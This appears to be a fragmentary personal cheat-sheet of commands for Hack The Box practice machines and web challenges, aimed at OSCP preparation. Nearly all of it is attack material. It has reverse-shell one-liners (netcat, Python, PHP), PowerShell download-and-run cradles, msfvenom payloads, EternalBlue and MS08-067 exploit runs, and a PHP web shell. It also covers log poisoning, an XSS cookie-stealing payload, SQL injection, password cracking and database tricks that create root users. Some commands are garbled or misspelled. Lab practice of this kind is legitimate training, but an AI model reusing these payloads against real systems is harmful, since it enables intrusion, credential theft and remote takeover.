Machines Practice

Follow this medium series for OSCP based Hackthebox machines writeups without MSF by Rana :)


one way to get root file
sudo /usr/bin/vi /var/www/html/../../../root/root.txt
2nd way
[email protected]:/home/haris$ sudo /usr/bin/vi /var/www/html/a :set shell=/bin/sh :shell
3rd way
sudo vi /var/www/html/a -c ':!/bin/sh'
python magento_rce.py '' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f"


nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt
masscan -e tun0 -p1-65535,U:1-65535 --rate=700
smbmap -H -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //


mount -t cifs // /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7


echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py
/dev/shm - writable directory
sudo -u scriptmanager bash
upload reverse shell if normal shell not working
python -c 'import pty;pty.spawn("/bin/bash")'


hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username" - not working ip block
find . | grep controllers
ldd --version - cat /etc/lsb-release
One solution to get root
Create one file monitor.sh
Other trick to get exploit for ubuntu version --------- Rational love exploit

Blue - window machine

Eternal blue : ms 17-010
nmap -p 445 --script safe -Pn -n ip [nmap -p 445 --script "vuln and safe" -Pn -n ip]
modify the python exploit and put location in our payload
Exploit modification required
add computer name in to host file and then scan smb servers
smbclient -L \ -N
smbclient \\haris-pc\Users
python exploit.py ip ntsvcs

Sense - Linux Machine - PFsense

manual cmd injection
on attacker machine run this command
nc -vnlp port < cmd
In cmd we have this reverse shell code
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("",3456)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
nc -lvnp 3456
exploit-db exploit


port 80 is opening httpfileserver
tcpdump -i tun0 %00{.exec|ping}
use invoke-powershelltcp.ps1
C:\Windows\SysWow64 - 32 bit windows C:\Windows\system32 - 32 bit windows C:\Windows\Sysnative - 64 bit
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping
ctrl shift u - to decode
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ip:port/InvokePowerhsleltcp.ps1').}
sherlock script execute to get the false positive patches
New-Object Net.WebClient}.downloadString('http://ip:port/InvokePowerhsleltcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress -Port 1234
New-Object Net.WebClient}.downloadString('')
cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032
IEX(New-Object Net.WebClient).downloadString('')
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')"

Node - Linux

3000- node
sed 's/,/\n/g' notes - password extract
crack the hashes online and offline
Hashes crack with hashcat and john hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt cat /home/alamot/.john/john.pot
online - hashes.org
grep -Ri password . | less
fcrackzip for zip files password cracker fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip
download file with wget ; wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU"
base64 -d myplace.backup >myplace
privsec to tom user
mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );
find / -perm -4000 2>/dev/null
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 "asd /bin/bash asd"
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 r??t/roo?.txt
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 root
using wildcard /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /rt/rt.txt | base64 -d > root.zip
command injection:
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"

Legacy - windows

Samba Scan
nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns
First Exploit - ms08-67
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python ms08-067.py 6 445
wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py rev_10.10.14.14_443.exe
host file with smbserver
smbserver.py a /usr/share/windows-binaries/


heartbleed vulnerability
python heartbleed.py -n 100 ip
for i in ${seq 0 100}; do python heartbleed.py ip; done
then find hype.key (hex to ascii)
ssh key and use this key and password get from heartbleed
ssh -i hype.key [email protected]
check the history and check ps elf | grep root
2nd exploit
gcc -pthread dirty.c -o dirty -lcrypt
su -
Fuzzy web app challenge‌
gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌
gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌
wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test​‌
wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ​‌
====================================== HDC HackTheBox Web Challenge Walkthrough/Solution‌
so the doProcess() function submits the form data to the jquery, Then i had a look at jquery-3.2.1.js CTRL+F and searched for the doProcess()‌
credentials stored in js file doprocess function‌
find emails on secret folder then run bruteforce in to all emails and get the flag‌
Lernaean Web Challenge — HackTheBox‌
hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593‌
========================================= CARTOGRAPHER‌
username= ’- and password= ‘ - sql injection‌


[20 Points] Lernaean [by Arrexel]‌
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 35414‌
=========================================== [50 Points]‌
I know Mag1k [by rkmylo]‌
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"‌
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"

Bastard - windows

Drupal payload chnages
$url = ''; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $phpcode = <<<'EOD' <?php if (isset($_REQUEST['fuplaod'])) { file_put_contents($_REQUEST['fupload'], file_get_contents("" . $REQUEST['fupload'])); }; if (isset($_REQUEST['fexec'])) {
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
}; ?> EOD; $file = [ 'filename' => 'sam.php', 'data' => $ippsec ];
IEX(New-Object Net.WebClient).downloadString('')
\\\sam\ms15-051x64.exe "\\sam\nc64.exe -e cmd.exe 443" [#] ms15-051 fixed by zcgonvh powershell iex(new-object net.webclient).downloadstring('')
\\a\ms15-051x64.exe "\\a\nc64.exe -e cmd.exe 443"
powershell iex(new-object net.webclient).downloadstring('')
powershell iex(new-object net.webclient).downloadstring('')
Shell with Nishang
python drupalgeddon3.py "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('')"
\\\share\ms15-051x64.exe "whoami"
\\\share\ms15-051x64.exe "\\\share\nc64.exe -e cmd.exe 443"
Poison - machine is vulnerable to lfi
add this shell in to user agent
User-Agent: 0xdf: <?php system($_GET['c']); ?>
then check the logs &c=id
connectivity check
tcpdump -i tun0 icmp
view-source: 8081
nc -lnvp 8081
Shell as WWW
Listening on localhost:
netstat -an -p tcp
ps -auwwx | grep vnc

Tunneling / VNC connection

tail /etc/proxychains.conf
ssh [email protected] -D 8081
proxychains vncviewer -passwd secret
Looking inside /root/.vnc/, there’s a passwd file that matches the file secret:
python /opt/vncpasswd.py/vncpasswd.py -d -f secret
LFi Filter :- php://filter/convert.base64-encode/resource=index.php
Request to add data in php variable which is visible on phpinfo.
Content-Type: multipart/form-data; boundary=--PleaseSubscribe
Content-Length: 166 ----PleaseSubscribe
Content-Disposition: form-data; name="sam"; filename="Leaveacomment"
Please share my videos
python sshng2john.py id_rsa > braingfuck-crack
john brainfuck-crack --wordlist=/usr/share/wordlis ts/rockyou.txt
wpscan –url https://brainfuck.htb –disable-tls-checks
cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .
wordpress exploit -> smtp cred -> smtp cred to get secret forum password - > Encryption decryption
ssh2john id_rsa > id_john
john id_john –wordlist=/usr/share/wordlists/rockyou.txt
In orestis home directory there are a few files debug.txt, encrypt.sage and output.txt After some google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large)https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e python -c “print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, ‘x’).decode(‘hex’)” 6efc1a5dbb8904751ce6566a305bb8ef
grandparents (granny & grandpa
granny & grandpa
iptables -A OUTPUT -d -j DROP
davtest --url
move options check move ippsec.html destination ippsec.aspx
ms14-070 exploit work for root ms15-051 - not work
curl -X PUT --data -binary @shell.aspx curl -X MOVE -H 'Destination: 5/shell.aspx'
Reverse shell on metasploit
check 3 exploits for privilege escalation : ms16-016 ms15-051 ms14-058 - working fine msf5 exploit(windows/local/ms14_058_track_popup_menu)
Microsoft IIS WebDav ‘ScStoragePathFromUrl’ Remote Buffer Overflow
. Use exploit/windows/iis/iis_webdav_scstoragepathfromurl. As we can see below, set options. << use exploit/windows/iis/iis_webdav_scstoragepathfromurl>> << options >> << set RHOST>> <<set LHOST <attacking machine ip> >> <<set LPORT 1234>>
<< use exploits/windows/local/ms15_051_client_copy_image >> << options >>
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20
Xss payload in to contact us form
<script>new Image().src=""+document.cookie;</script>
On submitting the UserID filter, I’m sent to https://intra.redcross.htb/?o=1&page=app, where o= is the id filtered on. If I try with a ' in there, https://intra.redcross.htb/?o=1'&page=app:
sqlmap -r app.request --delay=1 --batch --dump
sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs
nmap -p- --min-rate 5000
python 41162.py -c "ping -c 1" -t [email protected] -m
tcpdump -i tun0 -n icmp
python 41162.py -c "php -r '\$sock=fsockopen(\"\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t [email protected] -m
Injection RCE
Brup Suite RCE :

Priv esc to penelope

s = smtplib.SMTP(mailserver,1025)
./h.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t [email protected] -f [email protected] -m redcross

Priv esc to root

[email protected]:/etc$ psql -h -U unixnss -W unix
openssl passwd -1 0xdf
insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');

Path 1: sudoers Group

insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su

Path 2: Via unixnssroot

unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');
Find psql Configs
ls -l nss-pgsql*
cat nss-pgsql-root.conf
psql -h -U unixnssroot -p 5432 -d unix
This user can add a user with user id 0 (root):
insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot
Using this account, we are able to create a new user with UID 0:
insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');